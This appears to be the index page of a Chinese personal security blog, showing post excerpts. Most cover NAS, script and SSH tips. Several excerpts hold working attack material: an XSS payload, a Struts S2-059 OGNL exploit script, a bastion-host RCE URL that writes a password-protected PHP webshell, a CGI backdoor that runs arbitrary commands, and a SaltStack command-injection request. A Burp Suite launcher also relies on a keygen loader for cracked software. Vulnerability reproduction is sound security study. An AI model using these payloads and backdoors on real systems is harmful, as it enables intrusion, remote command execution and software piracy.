安利群晖
展示 群晖简介群晖是一款NAS 系统 ,目前市面上的NAS系统很多 比如 FreeNas TrueNAS Unraid PVE 等等 据说 群晖是借鉴的 FreeNas 并 改版 目前比较好用的是 DSM 6.2.2 + DS918 群晖能干嘛Docker 命令行改端口是意见非常痛苦的事情 添加环境变量也很痛苦 Docker 换源 还有一些人搞不懂,这个可以将阿里云的镜像加速地址填写进来,也可以参考我的 docker 加速 Synology Driver 因为我有两台 设备需要同步工具,所以我选择单向上传,另外一台设备 选择单向下载 同步 和 备份 比较好用 偶尔存在BUG Cloud Sync 这款工具 可以把文件加密后上传到百度网盘 密码和key千万不能丢 从百度云下载回来的文件需要解密才能打开,可以使用官方的 解密工具进行解密 Virtual Machine Manager这款工具是虚拟机 VMM 但是我的是amd cpu就不介绍了 Web Station 类似于简单的宝塔,但是又不简单,如果你有证书的话可以设置证书 并指定 HTTPS端口 甚至还能安装JAVA G ...
脚本与命令分享
脚本 首先我们专门设置一个用于放变量脚本的位置,比如我喜欢onedriver 我给这个目录一个环境变量 Gits ==> gits.bat / gits.sh1234@echo offchcp 65001setlocal EnableDelayedExpansiongit add . && git commit -m "Use GITS & %date% & Powered By %username%" && git push Cnpm超级好用的npm换源方案,你还在傻傻的安装cnpm吗? 1npm --registry https://registry.npm.taobao.org %* Ciphey1234@echo offchcp 65001cd %APPDATA%\roaming\python\python38\site-packages\ciphey\python3 ciphey.py %* Cerberus123@echo offchcp 65001python ...
烦死了
1/pcweb/home/index 这开发拖出去嘶啦嘶啦的。堪比国防,你们不写bug,等着失业吗? XRSec has the right to modify and interpret this article. If you want to reprint or disseminate this article, you must ensure the integrity of this article, including all contents such as copyright notice. Without the permission of the author, the content of this article shall not be modified or increased or decreased arbitrarily, and it shall not be used for commercial purposes in any way
Burp-Suite汉化及兼容调试
首先欢迎我们的小伙伴 20-12.1已经化身 蓝溯 就不放链接了。。。 结构 jre\ 指定java路劲即可保证无需安装也能愉快使用bp jre-tools bp各种插件 bp各种版本 bp20-11-03 09-01 12-01 或者更老的 bp.vbs 主要是用于启动 中文版 burp suite bp.jar bp的安装包java版 bpCN.jar bp的汉化包,要使用汉化必须带上 bploader.jar bp注册机需要用上的引导器 注册机.vbs 这个无需介绍了吧! 关键代码Burp Suite 汉化 启动 代码 1CreateObject("WScript.Shell").Run "./jre\bin\java.exe -noverify -javaagent:BurpSuiteLoader.jar -javaagent:BurpSuiteCn.jar -Dfile.encoding=utf-8 -jar bp.jar",0 bp.jar 则是指定的启动程序,可以把bp.jar ...
记一次自己博客的渗透
我的博客:xrsec.eu.org 打码也没用😂 最近一直闲的无聊,然后刚好在配置友链 遂来一波XSS xss-1 评论处存在XSS1<svg/onload = alert(1);> 评论xss钓鱼 xss挂马 xss killadmin xss盗取明文这个就不发了😂 搜索框xss 两个 一个反射 一个存储 顺便分享一个指纹 123"https://github.com/reruin/sharelist"ortitle=“网盘系统” XRSec has the right to modify and interpret this article. If you want to reprint or disseminate this article, you must ensure the integrity of this article, including all contents such as copyright notice. Without the permission of the author, the content of ...
溯光搭建及优化
✨关于溯光溯光,英文名“TrackRay”,意为逆光而行,追溯光源。同时致敬安全圈前辈开发的“溯雪”,“流光”。 溯光是一个开源渗透测试框架,框架自身实现了漏洞扫描功能,集成了知名安全工具:Metasploit、Nmap、Sqlmap、AWVS、Burpsuite等。 溯光使用 Java 编写,SpringBoot 作为基础框架,JPA + HSQLDB嵌入式数据库做持久化,Maven 管理依赖,Jython 管理 Python 插件,quartz 做任务调度,freemarker 做视图层,Websocket 实现命令行式插件交互。 ⭐️特点 使用只需要一个浏览器 集成 AWVS、SQLMap、NMap、Metasploit、Burpsuite、Crawlergo、Kunpeng、XRay 等安全工具 内置多个渗透测试辅助插件 方便、开源 ⚡️快速使用docker启动 git clone --depth=1 https://github.com/iSafeBlue/TrackRay.git 或下载 releases 最新版本源码 docker build -t trackra ...
status-s2059_061漏洞复现
status s2-059xss-1首先搭建靶场 12345git clone https://github.com/vulhub/vulhub.gitcd vulhub/struts2/s2-059docker-compose up -d# 建议换源操作网易源是个不错的选择# http://hub-mirror.c.163.com xss-2进入页面,这个页面 上poc(官网的没回显) https://dnslog.io/ 下面IP和dns地址记得修改 123456789101112import requestsurl = "http://127.0.0.1:8080"data1 = { "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=# ...
本站已开通订阅功能
小站新开通订阅功能,欢迎大家体验。 123456789101112131415161718 .::::. .::::::::. ::::::::::: ..:::::::::::' '::::::::::::' .:::::::::: '::::::::::::::.. ..::::::::::::. ``:::::::::::::::: ::::``:::::::::' .:::. ::::' ':::::' .::::::::. .::::' :::: .:::::::'::::. .:::' ::::: .:::::::::' ...
2020HVV中的漏洞
一、齐治堡垒机前远程命令执行漏洞(CNVD-2019-20835)1、访问 http://10.20.10.11/listener/cluster_manage.php :返回 “OK”.(未授权无需登录) 2、访问如下链接即可获得getshell,执行成功后,生成PHP一句话马 https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}” ZWNobyAnPD9waHAgQGV2YW 3.getshell访问路径: /var/www/shterm/resources/qrcode/lbj77.php https://10.20.10.10/shterm/resources/qrcode/lbj77.php(密码10086) 据说还是另外一个版本是java的: 12POST /shterm/listener/tui_update.phpa=["t';impo ...
Citrix_XenMobile服务器上的路径遍历
Citrix Endpoint Management(也称为XenMobile)用于管理员工的移动设备和移动应用程序。通常,由于Active Directory集成,它部署在网络外围并可以访问内部网络。这使XenMobile成为安全研究的主要目标。 在此类研究中,发现了路径遍历漏洞。此漏洞允许未经授权的用户读取任意文件,包括包含密码的配置文件。 CVE-2020-8209 –路径遍历利用此漏洞,可以读取Web服务器根目录之外的任意文件,包括配置文件和敏感的加密密钥。剥削不需要授权。在文件help-sb-download.jsp中标识了易受攻击的代码: 1<% String sbFilePath="/opt/sas/support/"; int length = 0; String sbFileName=(String)request.getParameter("sbFileName"); ServletOutputStream outStream = response.getOutputStream(); response.setHead ...
安全编排与自动化响应平台
安全编排与自动化响应平台 XRSec has the right to modify and interpret this article. If you want to reprint or disseminate this article, you must ensure the integrity of this article, including all contents such as copyright notice. Without the permission of the author, the content of this article shall not be modified or increased or decreased arbitrarily, and it shall not be used for commercial purposes in any way
CGI后门
123456789101112cd /tmpmkdir cgi-binecho '#!/bin/bash' > ./cgi-bin/backdoor.cgiecho 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgiecho 'echo -e $($1)' >> ./cgi-bin/backdoor.cgichmod +x ./cgi-bin/backdoor.cgipython -m http.server --cgiwget -q -O - "http://localhost:8000/cgi-bin/backdoor.cgi?whoami"student XRSec has the right to modify and interpret this article. If you want to reprint or disseminate this articl ...
CVE-2020-16846_SaltStack远程代码执行.
PoC: 12345678POST /run HTTP/1.1Host: 127.0.0.1:8000User-Agent: Mozilla/5.0Accept: application/x-yamlConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 87token=12312&client=ssh&tgt=pyn3rd&fun=a&roster=qwe&ssh_priv=aaa& open -a Calculator XRSec has the right to modify and interpret this article. If you want to reprint or disseminate this article, you must ensure the integrity of this article, including all contents such as copyright notice. W ...
Linux_SSHD
本教程所有命令在POWERSHELL下运行 Config 配置config文件 12345678910111213cd ~\.ssh\没有就创建 C:\Users\用户名\.ssh\notepad.exe .\config或者notepad.exe C:\ProgramData\ssh\ssh_configconfig格式:Host 主机名 HostName IP/domain User username Port 22 SSH Key 配置本地密钥,已有请忽略 1234生成密钥ssh-keygen -t rsatype .\id_rsa.pub复制结果 配置远程密钥 1234567891011121314151617首先ssh -P post username@IP/domainsudo apt-get/yum install openssh-serversudo vi /etc/ssh/sshd_config取消注释(搜索指定行)禁用密码登录,启用密钥登录sed -i "s/PasswordAuthentication yes/Passw ...
博客搬家
博客从20_03_01开始运行 中途尝试过多种方案 现在确定使用vercel 博客文章少的可怜,因为文章不小心丢了 可以参观一下 CNBLOGS